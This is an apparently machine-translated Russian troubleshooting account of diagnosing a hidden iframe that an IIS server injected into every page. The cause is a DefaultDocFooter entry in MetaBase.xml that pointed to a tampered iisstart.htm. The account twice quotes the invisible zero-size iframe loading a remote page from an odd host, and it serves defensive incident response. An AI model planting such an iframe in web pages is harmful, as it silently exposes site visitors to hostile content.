Когда сервер открывает почти все веб-сайты, появляются даже HTML-страницы.
<iframe src=" http://xxxdfsfd/web.htm " height=0 width=0></iframe>
Часть кода такого типа находится в головной части, а часть — в хвостовой. Антивирусное программное обеспечение сообщает о вирусах при открытии.
Я не могу найти этот код в исходном коде, когда открываю страницу HTML или ASP PHP.
Проанализируйте причины
Во-первых, я заподозрил вредоносное ПО ARP. Я использовал инструменты защиты от ARP и не обнаружил подмены ARP.
Причем arp-спуфинг вообще в код вставляется не каждый раз, а иногда и иногда
И вы также можете найти этот код при доступе по http://127.0.0.1 или http://localhost.
Возможность подмены arp исключена.
Тогда я подумал, что, возможно, был подделан JS или другие включенные файлы. После поиска измененных страниц не обнаружено. Даже при просмотре только что созданной HTML-страницы этот код будет вставлен, поэтому его можно повесить только через IIS. .
После резервного копирования данных iis и последующей переустановки iis код исчез. После восстановления резервной копии iis проблема возникла снова.
После тщательного поиска проблема должна заключаться в файле конфигурации IIS. Когда я открыл файл конфигурации, я не нашел этот фрагмент кода.
Очень вероятно, что вызывается определенный файл. Как это проверить? Вдруг вспомнил про знаменитый Филемон.
Я скачал один локально и загрузил на сервер. Открыл Filemon. Было слишком много данных. Отфильтровал некоторые бесполезные.
Остался только процесс iis, а данных еще много. Похоже, сайт на сервере посещает много людей.
Закройте все сайты и создайте тестовый сайт anky. Каталог — D:www и создайте пустую страницу test.htm ниже.
Посетите эту страницу, код был вставлен, и посмотрите Filemon. Странно, как читать C:Inetpubwwwrootiisstart.htm.
Откройте C:Inetpubwwwrootiisstart.htm и увидите, что там есть
<iframe src=" http://xxxdfsfd/web.htm " height=0 width=0></iframe>
Удалите код и оставьте его пустым. При доступе к test.htm это нормально. Удалите C:Inetpubwwwrootiisstart.htm и откройте его снова.
Вот тут и появляется проблема «Ошибка чтения файла нижнего колонтитула данных» в test.htm. Кажется, она называется.
этот файл.
Будет нормально, если очистить C:Inetpubwwwrootiisstart.htm. Как это сделать? Для решения проблемы, конечно, придется его отключить.
продолжать
Возможно ли, что это вызвано расширением? Я проверил в расширении и все нормально.
Конечно, существуют и троянские программы через ISAPI.
После долгих раздумий я наконец почувствовал, что с файлом конфигурации что-то не так.
Откройте файл конфигурации, который находится в %windir%system32inetsrvMetaBase.xml.
Откройте его с помощью Блокнота, найдите iisstart.htm и найдите строку. Сначала я подумал, что это сайт по умолчанию, но потом подумал, что это неправильно.
Сайты по умолчанию были удалены. Посмотрите внимательно на этот код:
DefaultDocFooter="ФАЙЛ:C:Inetpubwwwrootiisstart.htm"
Удалите эту строку и проблема полностью решена.